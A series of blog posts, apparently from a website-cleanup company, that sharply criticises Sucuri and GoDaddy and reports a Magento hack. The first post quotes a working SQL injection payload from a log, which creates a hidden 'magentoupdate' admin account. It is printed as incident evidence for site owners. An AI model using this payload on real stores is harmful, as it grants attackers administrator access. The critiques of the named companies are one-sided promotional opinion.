Hacker Using SQL Injection Vulnerability to Add “magentoupdate” Admin Account to Magento Websites

As is a common occurrence, we were recently hired to re-clean a hacked website that the security company Sucuri, which is owned by GoDaddy, had repeatedly failed to properly clean. This time it was a Magento based ecommerce website we were cleaning. As is standard issue in those situations they had missed malicious code that should have been easy to find. What we also found was that the hacker had been able to add an additional admin account, unfortunately that had occurred prior to the time period logging was still available, so we didn’t have evidence of how that had been done.

In a situation where we haven’t been able to determine how the hacker has gotten access, part of our cleanup process is to recheck things for a couple of weeks to see if the hacker tries to get back in. In this case the admin account returned a couple of days later.

For others dealing with the admin account in this situation had these details:

  • User Name: magentoupdate
  • Email: support@media.com
  • First Name: support
  • Last Name: support:

With the logging available from when this occurred we found a log entry where one of the URL parameters was this:

');insert%20into%20%60admin_user%60%20(firstname,lastname,email,username,password,created,lognum,reload_acl_flag,is_active,extra,rp_token,rp_token_created_at)%20values%20('support','support','support@media.com','magentoupdate','8df1e8abd8ce4761633042eb8958db97:rp',NOW(),0,0,1,'N;',NULL,NOW());INSERT%20INTO%20%60admin_role%60%20(parent_id,tree_level,sort_order,role_type,user_id,role_name)%20VALUES%20(1,2,0,%22U%22,(SELECT%20user_id%20FROM%20admin_user%20WHERE%20username%20=%20'magentoupdate'),'support');

That is SQL code that generates that admin user, which would be exploited through a SQL injection vulnerability. In this case it involved exploiting a SQL injection vulnerability in an extension on the website, which we then patched up.

Sucuri’s 30 Day Refund Guarantee Scam Gets Worse

Back in May of last year someone contacting us about cleaning a hacked website mentioned that Sucuri had told them that they had 30 day refund guarantee, but when we went to look into that we found that in reality Sucuri didn’t provide refunds if someone had requested a cleanup, which is what that person had contacted them about having done.

Here is how the refund guarantee was advertised on their homepage at the time:

30-Day Guarantee

You have 30 days to request a refund according to our Terms of Service.

If you looked at the terms of service it turned out there was one exception for that refund guarantee, the aforementioned limit if you had requested a clean up to be done:

You will have thirty (30) days from the Service Commencement Date or any Renewal Commencement Date to cancel the Service (the “Cancellation Period”), in which case the Company will refund your Service Subscription Fee for the applicable Service Term provided that you have not submitted a Malware Removal Request during the Cancellation Period.

They could spelled that on the homepage in less than words than it took to mention the terms of service, which seems like a good indication they are tying to hide that.

Since then the terms of service haven’t changed, but as we noticed when we went to look at something on their website recently, the marketing of the refund guarantee has gotten worse. For example at the top of the page about their website malware removals they write this:

Repair and restore hacked websites before it damages your reputation. We offer a 30-day money-back guarantee because we know we can help. You can rely on our dedicated incident response team, state-of-the-art technology, and excellent customer service.

If you actually try to get help though, they won’t provide you a refund, even if they didn’t even do anything, seeing as there is no refund if you request help.

Similar on the Immediate Help page which has its own menu section at the top of all the website’s pages, the description of the second step in the process is:

We offer a 30-day money-back guarantee because we know we can help. After completing your billing information, you’ll get access to the Sucuri Dashboard.

Why Are Experienced Security Analysts Failing To Get Websites Clean?

If you look at the rest of their information on their website malware removal page it seems like they are providing a good warning they something is amiss.

They claim that their cleanups are done by “experienced security analysts” and that that “we aim to provide the best malware removal service”:

Experienced Security Analysts

Our dedicated researchers monitor active malware campaigns. With a trained team of analysts, we aim to provide the best malware removal service around.

They also claim that “[n]o hack is too complex for our incident response team”:

Automatic and Manual Cleanups

We use scripts and tools to quickly scan your website for malware. Our analysts check your site manually too. No hack is too complex for our incident response team.

That makes another section seem rather odd, since they highlight that they provide “unlimited cleanups”, which shouldn’t be needed if they properly cleaning and securing websites (they actually do neither of those things properly):

Unlimited Cleanups

We love complex malware infections, and you’ll never pay more for them. Each plan covers your website for a year, including unlimited cleanups, pages, and databases.

Another claim that stands out is this:

Consider us an extension of your team. With professional security analysts available 24/7/365, you never have to worry about dealing with a hacked site.

In reality what we have hearing over and over from people coming to us after having used their service, is that they can’t get in touch with anyone at Sucuri. That doesn’t seem to be isolated issue, as numerous recent reviews of Sucuri on the website Trustpilot include the same complaint.

GoDaddy’s Idea of Security Involves Leaving Websites to Get Hacked

If it were not for seeing the great value we can provide in quickly resolving hacking situations that have gone on for weeks or months, we likely wouldn’t have anything to do with the security industry, since it is such an awful industry, which seems to be largely built around taking advantage of people. One reoccurring example of that is that those in the security industry promote leaving websites insecure as security, instead of telling people what would actually keep websites secure (which doesn’t involve the services they are selling). As yet another example of that, here is how GoDaddy sells people on a security service that they charge up to 29.99 a month for:

Complete protection for complete peace of mind.

Website Security powered by Sucuri is advanced protection made simple. There’s no software to install, daily security scans run automatically and if there’s ever an issue our auto removal tools can’t fix, our security experts will repair it manually – no matter how long it takes and at no additional cost to you.

By repairing the issue, they are talking about cleaning up a hack, which shouldn’t happen since the website is supposed to be protected.

Also of note, with the claims made in that quote, is that our experience from often being brought in to re-clean websites after their security division, Sucuri, fails to get the job done, is that sometimes they will keep doing incomplete cleanups and in other instances they won’t come back in and will falsely claim that a website is clean when it isn’t. In either case what they don’t do is attempt to properly clean up the websites in the first place, which would negate the need for even discussing repeated cleanups.

Paying a Lower Yearly Fee for an Ongoing Website Security Service When You Have a Hacked Website is Not a Deal

When people have had their website hacked the unfortunate reality is that there are lot of people out there looking to take advantage of them. A lot of that involves telling people what they want to hear while knowing that you are lying to them. Based on what people say when contacting us, what a lot of people with hacked websites are looking for is a service that will protect their website from being hacked again. The reality we tell them is that while there are plenty of services that claim to do that, they don’t work (as an example of that, we often have people coming to us asking if we offer a service like that that works after using one that didn’t prevent their website from being hacked) and in fact the providers of them don’t even present any evidence that even tries to support that they do. The additional reality is that the companies behind these services usually don’t even try to do the work that could possibly make them work.

That last element is in some ways the most important when it comes to someone that already has a hacked website, since part of the work that these service don’t do to try to protect website also is important part of cleaning up a hacked website. Just last Friday we mentioned an example of that with a company named Sucuri, which had press coverage for something that wasn’t meaningful when the real story should have been that they were publicly admitting cutting corners with hack cleanups by not even trying to determine how the website got hacked. If you don’t know how websites are being hacked, you are going to have a hard time even trying to protect them. That they admitted to that isn’t really surprising to us because we have been dealing with the after effects of their improper clean ups and their failure to protect website from being hacked in the first place for years.

Recently we had someone contact us while looking for a better deal for a website service after their web host GoDaddy was trying to sell them on a $299 a year subscription for a service provided Sucuri, which GoDaddy owns, after they claimed their website was hacked. Paying less for a service that won’t properly deal with a hack, isn’t a better deal, since at any price it isn’t going to properly resolve the situation. Instead, if your website is hacked what needs to be done is to get it properly cleaned up. Properly cleaning up a hacked website involves three key components:

  • Cleaning up the hack.
  • Getting the website secured as possible (which which usually involves getting any software on the website up date).
  • Trying to determine how the website was hacked and fix that.

Once that has been done, then doing the security basics is what is going to do a better job than these services to keep your website from being hacked again.

If you want your hacked website properly cleaned up your best bet is to hire us. On the other hand, if you want to get ripped off, then check out the other companies out there, since a lot of them would love to take advantage of you.

Security Journalists Should Be Focused on Sucuri Failing to Properly Clean up Hacked Websites Instead of Non-Notable Malicious Code

When it comes to the poor state of web security what is badly needed is security journalism that exposes what the many unscrupulous security companies are up to and how they take advantage of their customers, instead what we have found is they act more as the marketing department for them.

One such security company that would apply to is Sucuri, which is company that we are frequently brought in to re-clean hacked websites after they have not even attempted to properly clean them. One of the things we have often found that they haven’t done is try to determine how the website has been hacked. That is a problem for the cleanup, since you need to know how the website was hacked to be insure that vulnerability has been fixed and because from what we have found is that often Sucuri is missing parts of the hack code that could have been spotted if they had done the work needed to try to determine how the website was hacked. But the larger issue with this company not doing that is that their main service is supposed to protect websites from being hacked in the first place, which, in all likelihood, is going to be difficult if you don’t know how they are being hacked.

Sucuri’s own marketing speaks to the fact that they don’t seem focused on actually protecting websites, as on their home page they tout a number of stats about the service, not one is related to effectiveness of protecting websites:

The number of cleanups might be an indication of their failure to do that, if many of those are cleanups of existing customer’s websites (assuming the stats are even true).

You don’t have to take our word that Sucuri doesn’t try to determine how websites are hacked. A recent article on security news website Threatpost, Stealthy Malware Disguises Itself as a WordPress License Key, mentions that in passing, when it should be the focus of the story. Instead the focus of the story is in itself not newsworthy, as it reports on Sucuri describing a dime a dozen situation where malicious code has been added to the functions.php file of a WordPress theme. What might be newsworthy is how that code got there, but Sucuri didn’t even attempt to determine that:

“We had no access to their logs to determine the root cause, but it’s generally caused by compromised admin accounts or downloading and using themes/plugins from untrusted sources,” Moe Obaid, security analyst at Sucuri, told Threatpost.

Getting access to the logs would have been basic part of the work of a proper cleanup and shouldn’t be difficult.

How this person would know how this type of hack generally happens if they are not doing the work to determine that seems like an obvious question to ask them, but it would appear the Threatpost wasn’t interested in digging deeper in to an employee of this company admitting to cutting corners in the work they are doing. (You also have to wonder why someone is called “security analyst” if they don’t actual do security analysis.) One explanation for the lack of critical coverage of the security industry in this instance in general by the Threatpost, it that it appears itself to be owned by a security company.

When Sucuri Doesn’t Really Protect Your Website It Shouldn’t Be Surprising Their Cleanups Cause Problems As Well

We recently had someone contact us who was looking for a service that would protect their website from being hacked and clean up the website if it did get hacked. There is what seems to be us to be an obvious issue with that, which is that cleaning up hacks wouldn’t be necessary if the website was being successfully protected from being hacked. It also seems like a bad idea to expect that if a company is providing a service where half of it doesn’t work that the other half will actually work well. When it comes to services that offer both of those things, our experience is that their providers usually are not just bad at both, but don’t even attempt to do the work that would be needed to do them properly.

As a case in point, we were contacted by someone last week that was using Sucuri’s service that provides both of those. The service failed to protect the website from getting infected with malware. Sucuri’s first clean up failed to stop it from getting infected again (or didn’t fully clean it up), which is not all surprising based on lots of previous instances we have been brought in to re-clean things after they failed to even attempt to do things properly.

After the second cleanup the website was broken. Once Sucuri fixed that issue, it was broken in another way, at which point the owner of the website contacted us.

There really isn’t any reason that anyone should be relying on Sucuri at this point (which was equally true years ago as well). They have shown they lack an even basic understanding of security and their own marketing material indicates they are not focused on providing effective protection. They fail to properly deal with hacked websites with even the most serious hacking issues or high profile websites (we were recently hired to re-clean a hacked website they failed to clean, for which the hack was being investigated by the FBI).

GoDaddy Says That Version of PHP for Which Support Ended 3 Years Ago Meets Their Stability and Security Requirements

You would think that if a web host owned a security company they would be better than other web hosts when it comes to security. With GoDaddy that isn’t the case, though that might be explained by the fact that the security company they own Sucuri, seems to be completely incompetent. As yet another example of the security issues with GoDaddy, while dealing with a support issue on a website hosted with them we found that they were making this claim about PHP 5.4 on the Programming Languages page of their control panel on the website we were working on:

PHP version 5.4 is available and meets our stability and security requirements.

Support for PHP 5.4 ended in September of 2015.

To make thing more confusing if you click the question mark icon next to radio selector to use that version of PHP on the page a message box appears that states:

Version 5.4 is no longer actively supported.

So is the first claim inaccurate or do they have really low standards for “stability and security”?

GoDaddy’s Idea of Securing Websites Actually Involves Leaving Them Insecure and Trying to Deal with the After Effects of That

Yesterday we discussed GoDaddy’s usage of misleading claims to try to sell overpriced SSL certificates. Based on that it probably wouldn’t be surprising to hear that they would mislead people in other ways about security and that is exactly what we ran across while looking into things while working on that previous post.  When we clicked on the “Add to Cart” button for one of their SSL certificates, at the bottom of the page we were taken to, there was a “malware scan and removal” service offered to “Secure your site”:

The description of that is:

Defend your site against hackers and malware with automatic daily scans and guaranteed cleanup.

It shouldn’t be too complicated to understand what is wrong with that, though as we mentioned earlier today there seems to be a lot of confusion when it comes to what security services and products do.

If a website is secure it wouldn’t have malware or some other hack on it to detect or remove, so either GoDaddy doesn’t understand what they are providing or they are lying about.

The problem we see so often with this sort of service is that people will fail to do the things that will actually keep websites secure because they believe a service like this will actually keep a website secure.

Trying to deal with the after effects of having a website hacked instead of actually securing it introduces a lot of issues. One of those being that if a hacker uses the hack to exfiltrate customer data stored on the website a cleanup isn’t going to undo that.

What is a lot more important to note is that everything we have seen from the underlying provider of GoDaddy’s security services, Sucuri, is that they are not good at detecting and cleaning up hacks of websites. Their scanner seems, to put it politely, incredibly crude. Their employees seem to lack a basic capability to understand evidence that a website is hacked. And in what is most relevant to this specific service, we recently we brought in on a situation where their scanner had failed to detect that a website was hacked and then they repeatedly incompletely cleaned up the website, leaving it in a hacked state for a while. It was only after we were brought in to clean things up properly (which Sucuri doesn’t appear to even attempt to do) that it was finally cleaned and stayed that way.

Sucuri’s 30 Day Guarantee Guarantees That They Won’t Properly Clean Up Your Website

In our dealing with the continued poor state of web security, which seems to be a microcosm of the poor state of security in general, what we see is that there are many different pieces that all come together to get to the current situation. The really terrible shape of the security industry probably couldn’t exist without the public helping them out in numerous ways. One of those ways is that you have a lot of people that don’t really seem to be paying much attention before handing over money to unscrupulous security companies.

We recently had someone contact us looking for help with a hacked website. They hadn’t provided any details as to how they thought the website was hacked and considering that many people come to us that think a website has been hacked when it hasn’t, we first went to look at the website to see if we noticed any issues. We noticed one issue and we then responded asking if that was what was at issue or if there something more. They responded that they already were a paying customer and had sent several message to support that they hoped we would address. Neither of those things sounded like us, especially since we charge after we have completed a cleanup, not before. It turned out that they had confused us with another company named Sucuri.

What was odder about that was that the person said they had seen Sucuri mentioned on our website and decided to give them a try. Considering that we have repeatedly written about problems caused by Sucuri, particularly involving hack cleanups, it doesn’t seem they could have been paying almost any attention to what we had written about that company.

That ties in to understanding something else that they mentioned, which is that Sucuri told them they provide a 30 day money back guarantee. They didn’t look into the details on that, which they should have.

We were curious to see what Sucuri’s refund policy actually was and found that they are inconsistent in what they claiming to provide. More importantly there are some huge caveats, so the guarantee would be of no value in a lot of cases.

On the homepage they advertise it this way:

30-Day Guarantee

You have 30 days to request a refund according to our Terms of Service.

Looking at the terms of service they first state:

You will have thirty (30) days from the Service Commencement Date or any Renewal Commencement Date to cancel the Service (the “Cancellation Period”), in which case the Company will refund your Service Subscription Fee for the applicable Service Term provided that you have not submitted a Malware Removal Request during the Cancellation Period.

Based on that if you sign up for their service and request a cleanup you can’t get a refund, so if they don’t properly clean things up (as they won’t) you are left paying for something that wasn’t done right.

In listing their various levels of service they make a big point of response time, so it seems pretty likely that they expect that many of their customers are coming to them looking for a cleanup:

So it seems like their refund offer would probably be immediately null for many of their customers. It also seems like if they were interested in be honest with their potential customers they would be upfront about that limitation, instead of burying that important limitation in a long legal document.

Later in the terms of service page they say something different:

If at any time during the Service Term, you submit a Malware Removal Request for a Covered Website that Company determines is infected, Company will use reasonable commercial efforts to clean the infected Covered Website. In the event that Company is unable, for any reason, to clean the infected Covered Website, Company will, as its sole and exclusive remedy, refund to you the annual fee you paid to the Company for the clean up of that Covered Website.

That would sound significant if we haven’t see what can actually happen when Sucuri is supposed to be dealing with a hacked website.

In April of last year we discussed a situation that we were brought in where Sucuri’s service had been purchased and they had claimed to have cleaned a website. When the original issue, credit cards being used on the website were being compromised, continued, the person running the website contacted Sucuri about that and Sucuri told them that the website was clean, despite it being very likely it wasn’t. This person wasn’t looking for a refund, just for them to clean things up, which considering Sucuri’s service is marketed as providing “Unlimited Malware & Hack Cleanup”, shouldn’t have been an issue. They instead had to hire us to get things properly cleaned up.

On Sucuri’s page about cancelling an account they have the following Refund section:

Refunds

Refunds are only available within 30 days of purchase and will only be issued in case a manual malware removal was not completed. On all other cases, you can cancel the account, but a refund will not be provided.

That doesn’t match what is written in the terms of service, so who knows what is going on there. But if that is to be believed all they are actually offering is a refund if they don’t “complete” a manual malware removal. Considering that based on everything we have Sucuri doesn’t even really attempt to do complete cleanups, that doesn’t seem meaningful.

Right below that section is a Guarantee section:

Guarantee

We guarantee our work, so if your site gets reinfected we will clean it up again until it is 100% clean. But you also have to do your part and keep your sites updated, change passwords and follow our recommendations.

If you do not follow our recommendations, we will not clean it up again until they are done.

As situation we were brought in to clean up after Sucuri in March shows, even when Sucuri is willing to clean things up again it doesn’t mean the website is ever going to get fully cleaned as the website in that situation was repeatedly incompletely cleaned up by Sucuri. What was happening is that Sucuri repeatedly removed parts of the hack, but since they didn’t remove the others, what they were removing just came back over and over.

One of things that would have stopped that cycle would have been if Sucuri had done one of the three pieces of a proper clean up, which is trying to determine how the website was hacked, as reviewing the logging as part of that would have identified where the remaining malicious code was.

Sucuri not only fails to do that piece of a proper clean up, but they fail to do another one, which involves getting the website secure as possible. That usually mainly consists of getting any software on the website up to date. Based on that guarantee language they even try to push that off to the customer.

In fact while they sell their service as website security service, the guarantee seems to indicate they don’t do anything that will actually secure the website. What it looks like is that you are paying them an ongoing fee for them to be on call to improperly clean up your website.

If your website hasn’t been hacked you would be better off spending your time and money on doing the basics of security, as doing those things will greatly reduce the chances of the website being hacked. If your website has been hacked you would better off hiring someone like us that will actually clean the website up properly and fully stands behind their work instead of providing you with a misleading “guarantee”.

Does Sucuri Believe That There Are Unreal People Working At Other Website Security Companies?

Recently we have been taking a closer look at how website security services are marketed and how they provide what seem like they should be warning signs as to the reality that the services don’t actually provide real security. We ran into another example involving Sucuri, which also involves an odd tag line.

Here was an ad form that showed up in search results while we were looking into for some information for another recent post on this blog:

The tagline there is “Real People, Real Security”. The first part of that is odd, do they believe other website security companies employ unreal people? The second part of that though is more problematic, since Sucuri doesn’t provide real security. That is something that is hinted at by what else is mentioned in the ad. If they could provide real security then websites using their services wouldn’t be getting malware on them that needs to be cleaned, much less repeatedly, and yet one of the things they are touting in that ad is that they provide “Unlimited Malware Cleanup”.

As we noted recently, Sucuri doesn’t present evidence, much less from evidence from independent testing, that their service is actually effective at protecting websites. So it would seem either they don’t know if they provide real security or they know they don’t provide real security, as we assume if they were actually measuring or testing to see if they provide real security they would tout the results if they were good.

There is plenty of reason to believe they don’t provide real security since as we also noted recently, it can be incredibly easy to bypass a critical piece of Sucuri’s offering, their website application firewall (WAF).

As we also noted recently, getting unlimited cleanups from Sucuri isn’t necessarily all that useful since we were recently brought in to deal with a website where Sucuri was repeatedly doing incomplete cleanups that didn’t resolve a hack.

It also worth noting that while Sucuri has real people (again, who wouldn’t?), what is important is if they competent and what we have seen doesn’t point in that direction. For example, just about a year ago SiteLock was telling one of their customers that their website was clean when it seems to us that someone that hasn’t basic competency in the field would have realized that wasn’t true and the employee(s) failed to spot malicious code that we easily found on the website.